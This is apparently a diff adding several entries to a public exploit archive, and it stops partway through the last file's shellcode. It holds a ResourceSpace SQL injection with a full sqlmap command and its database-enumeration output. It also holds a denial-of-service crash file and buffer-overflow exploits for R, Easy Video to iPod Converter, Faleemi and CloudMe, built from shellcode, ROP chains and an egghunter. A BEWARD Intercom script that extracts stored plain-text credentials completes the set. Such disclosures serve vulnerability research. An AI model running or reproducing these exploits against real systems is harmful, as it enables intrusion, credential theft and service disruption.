+# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
+# Vendor Alerted: 1/21/2019
+# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.
+
+
+# POC:
+# 1)
+# http://localhost/pages/collection_edit.php?CSRFToken=[CRSF_TOKEN_HERE]&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=[SQL]&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
+
+
+
+
+# Running the SQLMap command:
+
+sqlmap -u 'http://localhost/pages/collection_edit.php' --data='CSRFToken=<csrf token>&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=*&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0' --cookie='language=en-US;language=en-US;thumbs=show;user=3154df279ea69a45caeaccf8a5fd1550;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_themes_order_by=name;saved_themes_sort=ASC;display=thumbs;per_page=48;saved_sort=DESC;geobound=-5244191.6358594%2C-786628.3871876%2C4;plupload_ui_view=list;ui_view_full_site=true' --dbms=mysql --level=5 --risk=3 -p keywords --technique=ETB --dbs --current-user --current-db --is-dba
+
+
+
+
+# Will trigger the following injection methods:
+
+
+[*] starting @ 13:21:45 /2019-01-25/
+
+[13:21:45] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: keywords (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE (SELECT (CASE WHEN (6076=6076) THEN 0x3125323532372532353246253235324125323532412532353246524c494b452532353246253235324125323532412532353246253235323853454c454354253235324625323532412532353241253235324625323532384341534525323532462532353241253235324125323532465748454e253235324625323532412532353241253235324625323532384f524425323532384d49442532353238253235323853454c454354253235324625323532412532353241253235324649464e554c4c2532353238434153542532353238434f554e54253235323844495354494e43542532353238736368656d615f6e616d65253235323925323532392532353246253235324125323532412532353246415325323532462532353241253235324125323532464348415225323532392532353243307832302532353239253235324625323532412532353241253235324646524f4d2532353246253235324125323532412532353246494e464f524d4154494f4e5f534348454d412e534348454d41544125323532392532353243312532353243312532353239253235323925323533453536253235323925323532462532353241253235324125323532465448454e2532353246253235324125323532412532353246312532353246253235324125323532412532353246454c53452532353246253235324125323532412532353246307832382532353246253235324125323532412532353246454e44253235323925323532392532353246253235324125323532412532353246414e4425323532462532353241253235324125323532462532353237534a584e253235323725323533442532353237534a584e ELSE 0x28 END)) AND 'HDWY'='HDWY&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' AND EXTRACTVALUE(8779,CONCAT(0x5c,0x716b786a71,(SELECT (ELT(8779=8779,1))),0x7176626271)) AND 'cjUk'='cjUk&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 RLIKE time-based blind
+    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE SLEEP(5) AND 'EqqU'='EqqU&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
+---
+[13:21:47] [INFO] testing MySQL
+[13:21:47] [INFO] confirming MySQL
+[13:21:48] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Nginx 1.14.0
+back-end DBMS: MySQL >= 5.0.0
+[13:21:48] [INFO] fetching current user
+[13:21:50] [INFO] retrieved: 'pwner@localhost'
+current user:    'pwner@localhost'
+[13:21:50] [INFO] fetching current database
+[13:21:52] [INFO] retrieved: 'resourcespace'
+current database:    'resourcespace'
+[13:21:52] [INFO] testing if current user is DBA
+[13:21:52] [INFO] fetching current user
+current user is DBA:    False
+[13:21:53] [INFO] fetching database names
+[13:21:54] [WARNING] the SQL query provided does not return any output
+[13:21:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
+[13:21:54] [INFO] fetching number of databases
+[13:21:54] [INFO] resumed: 6
+[13:21:54] [INFO] resumed: information_schema
+[13:21:54] [INFO] resumed: mysql
+[13:21:54] [INFO] resumed: performance_schema
+[13:21:54] [INFO] resumed: phpmyadmin
+[13:21:54] [INFO] resumed: resourcespace
+[13:21:54] [INFO] resumed: sys
+available databases [6]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] resourcespace
+[*] sys
+
+[13:21:54] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/localhost'
+
+[*] ending @ 13:21:54 /2019-01-25/

exploits/windows/dos/46272.py

@@ -0,0 +1,25 @@
+# Exploit Title: Smart VPN 1.1.3.0 - Denial of Service (PoC)
+# Date: 1/28/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/store/productId/9NH1G93D4HKR
+# Version: 1.1.3.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the top right search bar and hit Enter
+# App will now crash
+
+buffer = "A" * 2100
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+print "File cannot be created"

exploits/windows/local/46255.py

@@ -0,0 +1,27 @@
+# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
+# Date: 2019-01-26
+# Exploit Author: Nawaf Alkeraithe
+# Twitter: @Alkeraithe1
+# Vulnerable Software: Easy Video to iPod Converter 1.6.20
+# Vendor Homepage: http://www.divxtodvd.net/
+# Version: 1.6.20 
+# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
+# Tested Windows XP SP3 x86
+
+# PoC Steps
+#1- run the program
+#2- click on "Register"
+#3- In the "Enter User Name" field, past the content of the payload, and click "OK"
+
+
+junk = "A"*996
+jmp = "\xEB\x06\x90\x90"
+popPopRetAddr = "\x11\x7B\x03\x10"
+NOPs = "\x90"*20;
+shellCode = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
+
+payload = junk + jmp + popPopRetAddr + NOPs + shellCode
+
+exploitText = open("exploit.txt","w")
+exploitText.write(payload)
+exploitText.close()

exploits/windows/local/46265.py

@@ -0,0 +1,66 @@
+#!/usr/bin/python
+# Exploit Title: R 3.4.4 - Local Buffer Overflow (Windows XP SP3)
+# Date: 21/01/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://cloud.r-project.org/bin/windows/
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Version: 3.4.4
+# Tested on: Windows XP Prof SP3 ENG x86
+# Note: No SEH exploitation required (SEH for Windows 7 by ZwX available on exploit-db).
+# CVE: TBC from Mitre
+# Created in preparation for OSCE - DC - Telspace Systems
+# Used alpha_upper with "\x00" for badchars
+# PoC:
+# 1.) Generate exploit-calc-final.txt, copy the contents to clipboard
+# 2.) In application, open 'Gui Preferences' under "Edit" open app, select Edit, select 'GUI preferences'
+# 3.) Paste the contents of exploit-calc-final.txt under 'Language for menus and messages'
+# 4.) Click OK
+
+#Exact offset 292
+#7E429353   FFE4             JMP ESP - user32.dll
+#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c
+
+shellcode = ("\x89\xe0\xda\xda\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
+"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
+"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
+"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
+"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4c\x42\x53\x30\x45"
+"\x50\x33\x30\x53\x50\x4b\x39\x4d\x35\x56\x51\x4f\x30\x55\x34"
+"\x4c\x4b\x36\x30\x46\x50\x4c\x4b\x30\x52\x54\x4c\x4c\x4b\x46"
+"\x32\x55\x44\x4c\x4b\x43\x42\x57\x58\x54\x4f\x4e\x57\x51\x5a"
+"\x57\x56\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x33\x51\x43\x4c\x43"
+"\x32\x36\x4c\x31\x30\x39\x51\x38\x4f\x54\x4d\x43\x31\x49\x57"
+"\x5a\x42\x4c\x32\x46\x32\x50\x57\x4c\x4b\x50\x52\x52\x30\x4c"
+"\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x52\x31\x34\x38\x4d\x33"
+"\x51\x58\x33\x31\x38\x51\x46\x31\x4c\x4b\x31\x49\x37\x50\x45"
+"\x51\x58\x53\x4c\x4b\x50\x49\x34\x58\x4b\x53\x56\x5a\x50\x49"
+"\x4c\x4b\x30\x34\x4c\x4b\x35\x51\x4e\x36\x36\x51\x4b\x4f\x4e"
+"\x4c\x39\x51\x38\x4f\x34\x4d\x55\x51\x49\x57\x36\x58\x4b\x50"
+"\x54\x35\x4a\x56\x53\x33\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x47"
+"\x54\x43\x45\x4a\x44\x30\x58\x4c\x4b\x46\x38\x46\x44\x55\x51"
+"\x49\x43\x53\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x48\x35"
+"\x4c\x53\x31\x38\x53\x4c\x4b\x43\x34\x4c\x4b\x55\x51\x48\x50"
+"\x4d\x59\x37\x34\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
+"\x59\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x51\x4a"
+"\x4c\x4b\x55\x42\x4a\x4b\x4c\x4d\x51\x4d\x43\x5a\x53\x31\x4c"
+"\x4d\x4d\x55\x48\x32\x33\x30\x53\x30\x33\x30\x50\x50\x43\x58"
+"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4a"
+"\x50\x48\x35\x39\x32\x51\x46\x35\x38\x49\x36\x4c\x55\x4f\x4d"
+"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x33\x4c\x35\x5a\x4d"
+"\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x47\x37\x34\x53"
+"\x54\x32\x42\x4f\x43\x5a\x35\x50\x30\x53\x4b\x4f\x48\x55\x45"
+"\x33\x53\x51\x42\x4c\x55\x33\x46\x4e\x52\x45\x42\x58\x53\x55"
+"\x53\x30\x41\x41")
+
+buffer = "A" * 292 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
+
+payload = buffer
+try:
+    f=open("exploit-calc-final.txt","w")
+    print "[+] Creating %s bytes payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/46267.py

@@ -0,0 +1,88 @@
+#!/usr/bin/env python
+# -*- coding: utf8 -*-
+#
+# BEWARD Intercom 2.3.1 Credentials Disclosure
+#
+#
+# Vendor: Beward R&D Co., Ltd
+# Product web page: https://www.beward.net
+# Affected version: 2.3.1.34471
+#                   2.3.0
+#                   2.2.11
+#                   2.2.10.5
+#                   2.2.9
+#                   2.2.8.9
+#                   2.2.7.4
+#
+# Note: For versions above 2.2.11: The application data directory, which
+# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
+#
+# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
+# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
+#
+# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
+# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
+# control.
+#
+# Desc: The application stores logs and sensitive information in an unencrypted
+# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
+# the current user session can successfully disclose plain-text credentials that
+# can be used to bypass authentication to the affected IP camera and door station
+# and bypass access control in place.
+#
+# Tested on: Microsoft Windows 10 Home (EN)
+#            Microsoft Windows 7 SP1 (EN)
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5505
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
+#
+#
+#
+#######################################################################
+# Output:
+# --------
+# C:\> python beward_creds.py
+# Username: admin
+# Password: S3cr3tP4$$w0rd
+# C:\> 
+#
+#######################################################################
+#
+# 28.11.2018
+#
+
+import subprocess
+import mmap######
+import re########
+import os########
+
+#
+# For versions bellow 2.2.11:
+#
+# cuser = subprocess.check_output("echo %username%", shell=True)
+# dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap'
+#           'pData\Local\Beward R&D Co., Ltd\BEW'
+#           'ARD Intercom\DB\BEWARD.INTERCOM.FDB'
+#          )
+#
+
+#
+# For versions 2.2.11 and above:
+#
+
+dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'
+
+def mapfile(filename):
+    file = open(filename, "r+")
+    size = os.path.getsize(filename)
+    return mmap.mmap(file.fileno(), size)
+
+data = mapfile(dbfile)
+m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
+print "Username: " + m.group(1)
+m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
+print "Password: " + m.group(1)

exploits/windows/local/46269.py

@@ -0,0 +1,113 @@
+#!/usr/bin/python
+
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
+# Date: 01-26-19
+# Vulnerable Software: Faleemi Desktop Software 1.8
+# Vendor Homepage: https://www.faleemi.com/
+# Version: 1.8.0 
+# Software Link 1: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. open/copy contents of faleemidep.txt  
+# 3. open app, click on System Setup
+# 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field 
+# 5. click on save
+# 6. pop calc
+
+# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
+# practicing dep bypass by not using auto generated mona.py ropchains
+
+# original seh poc from Gionathan "John" Reale, EDB: 45402
+
+# badchars; \x00\x0a\x0d\x2f
+
+import struct   
+filename = "faleemidep.txt"
+
+junk = "A" * 264
+
+#0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN
+seh = "\x7e\xea\x01\x60"
+fill = "C"*524 
+
+#VirtualAlloc()
+#EDI = ROP NOP (RETN)
+rop = struct.pack('<L',0x60018221)  # POP EDI # RETN 
+rop += struct.pack('<L',0x60018222) # ROP-NOP
+
+#ECX = flProtect (0x40)
+rop += struct.pack('<L',0x60047e71)  # POP ECX # RETN 
+rop += struct.pack('<L',0xffffffff)  
+for i in range(0,65): rop += struct.pack('<L',0x6004bcc7)  # INC ECX # RETN 
+
+#ESI = ptr to VirtualAlloc()
+rop += struct.pack('<L',0x6004aaca)  # POP EAX # RETN 
+rop += struct.pack('<L',0x6004f0bc)  # ptr to &VirtualAlloc() 
+rop += struct.pack('<L',0x68b88b96)  # MOV EAX,DWORD PTR DS:[EAX] # RETN
+rop += struct.pack('<L',0x73d63c82)  # XCHG EAX,ESI # RETN 
+	
+#EDX = flAllocationType (0x1000)
+# Math 1)FFFFFFFF - 0cc48368 = 0F33B7C97 Math 2)0F33B7C97 + 1001 = F33B8C98)
+rop += struct.pack('<L',0x68b832d3) # MOV EDX,0CC48368 # RETN 
+rop += struct.pack('<L',0x60036b1c) # POP EBX # RETN 
+
+rop += struct.pack('<L',0xF33B8C98)
+rop += struct.pack('<L',0x6004e5ce)  # ADD EDX,EBX # POP EBX # RETN 0x10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
+
+#EBP = ReturnTo (ptr to jmp esp)
+#!mona jmp -r esp -cpb '\x00\x0a\x0d\x2f'
+rop += struct.pack('<L',0x68b901e9) # POP EBP # RETN 
+rop += struct.pack('<L',0x73dd4206) # jmp esp 
+      
+#EBX = dwSize (0x1)
+rop += struct.pack('<L',0x73dbfebc) # POP EBX # RETN 
+rop += struct.pack('<L',0xffffffff) 
+rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN
+rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN
+
+#EAX = NOP (0x90909090)
+rop += struct.pack('<L',0x6004aaca)  # POP EAX # RETN
+rop += struct.pack('<L',0x90909090)  # NOPs
+
+#PUSHAD	
+rop += struct.pack('<L',0x6004bd85) # PUSHAD # RETN
+
+nops = "\x90"*10
+
+#msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python
+calc =  ""
+calc += "\xd9\xf7\xb8\x0c\xa1\xba\x34\xd9\x74\x24\xf4\x5b\x29"
+calc += "\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x18\x43"
+calc += "\x4f\xc8\xc8\x01\xb0\x31\x08\x66\x38\xd4\x39\xa6\x5e"
+calc += "\x9c\x69\x16\x14\xf0\x85\xdd\x78\xe1\x1e\x93\x54\x06"
+calc += "\x97\x1e\x83\x29\x28\x32\xf7\x28\xaa\x49\x24\x8b\x93"
+calc += "\x81\x39\xca\xd4\xfc\xb0\x9e\x8d\x8b\x67\x0f\xba\xc6"
+calc += "\xbb\xa4\xf0\xc7\xbb\x59\x40\xe9\xea\xcf\xdb\xb0\x2c"
+calc += "\xf1\x08\xc9\x64\xe9\x4d\xf4\x3f\x82\xa5\x82\xc1\x42"
+calc += "\xf4\x6b\x6d\xab\x39\x9e\x6f\xeb\xfd\x41\x1a\x05\xfe"
+calc += "\xfc\x1d\xd2\x7d\xdb\xa8\xc1\x25\xa8\x0b\x2e\xd4\x7d"
+calc += "\xcd\xa5\xda\xca\x99\xe2\xfe\xcd\x4e\x99\xfa\x46\x71"
+calc += "\x4e\x8b\x1d\x56\x4a\xd0\xc6\xf7\xcb\xbc\xa9\x08\x0b"
+calc += "\x1f\x15\xad\x47\x8d\x42\xdc\x05\xdb\x95\x52\x30\xa9"
+calc += "\x96\x6c\x3b\x9d\xfe\x5d\xb0\x72\x78\x62\x13\x37\x76"
+calc += "\x28\x3e\x11\x1f\xf5\xaa\x20\x42\x06\x01\x66\x7b\x85"
+calc += "\xa0\x16\x78\x95\xc0\x13\xc4\x11\x38\x69\x55\xf4\x3e"
+calc += "\xde\x56\xdd\x5c\x81\xc4\xbd\x8c\x24\x6d\x27\xd1"
+
+pad = "D" * (7000-len(fill + rop + nops + calc))
+
+buffer = junk + seh + fill + rop + nops + calc + pad
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()

exploits/windows_x86-64/remote/46250.py

@@ -0,0 +1,86 @@
+# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
+# Date: 24.01.2019
+# Exploit Author: Matteo Malvica
+# Vendor Homepage:https://www.cloudme.com/en
+# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
+# Category: Remote
+# Contact:https://twitter.com/matteomalvica
+# Version: CloudMe Sync 1.11.2
+# Tested on: Windows 7 SP1 x64
+# CVE-2018-6892
+# Ported to WoW64 from https://www.exploit-db.com/exploits/46218 
+
+import socket
+import struct
+
+def create_rop_chain():
+	# rop chain generated with mona.py - www.corelan.be
+        rop_gadgets = [
+		0x61ba8b5e,  # POP EAX # RETN [Qt5Gui.dll] 
+		0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
+		0x61bdd7f5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll] 
+		0x68aef542,  # XCHG EAX,ESI # RETN [Qt5Core.dll] 
+		0x68bfe66b,  # POP EBP # RETN [Qt5Core.dll] 
+		0x68f82223,  # & jmp esp [Qt5Core.dll]
+		0x6d9f7736,  # POP EDX # RETN [Qt5Sql.dll] 
+		0xfffffdff,  # Value to negate, will become 0x00000201
+		0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll] 
+		0x61e870e0,  # POP EBX # RETN [Qt5Gui.dll] 
+		0xffffffff,  #  
+		0x6204f463,  # INC EBX # RETN [Qt5Gui.dll] 
+		0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll] 
+		0x61ec44ae,  # POP EDX # RETN [Qt5Gui.dll] 
+		0xffffffc0,  # Value to negate, will become 0x00000040
+		0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll] 
+		0x61e2a807,  # POP ECX # RETN [Qt5Gui.dll] 
+		0x6eb573c9,  # &Writable location [libgcc_s_dw2-1.dll]
+		0x61e85d66,  # POP EDI # RETN [Qt5Gui.dll] 
+		0x6d9e431c,  # RETN (ROP NOP) [Qt5Sql.dll]
+		0x61ba8ce5,  # POP EAX # RETN [Qt5Gui.dll] 
+		0x90909090,  # nop
+		0x61b6b8d0,  # PUSHAD # RETN [Qt5Gui.dll] 
+  	]
+        return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+target="127.0.0.1"
+junk="A"*1052
+eip = "\xfc\x57\xea\x61" #  0x61ea57fc  	
+nops = "\x90\x90\x90\x90" 
+
+egg64 = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
+"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
+"\x2e\x5a\x3c\x05\x74\xea\xb8"
+"\x77\x30\x30\x74"  # tag w00t
+"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
+"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
+
+#Shellcode calc.exe
+shellcode = ""
+shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
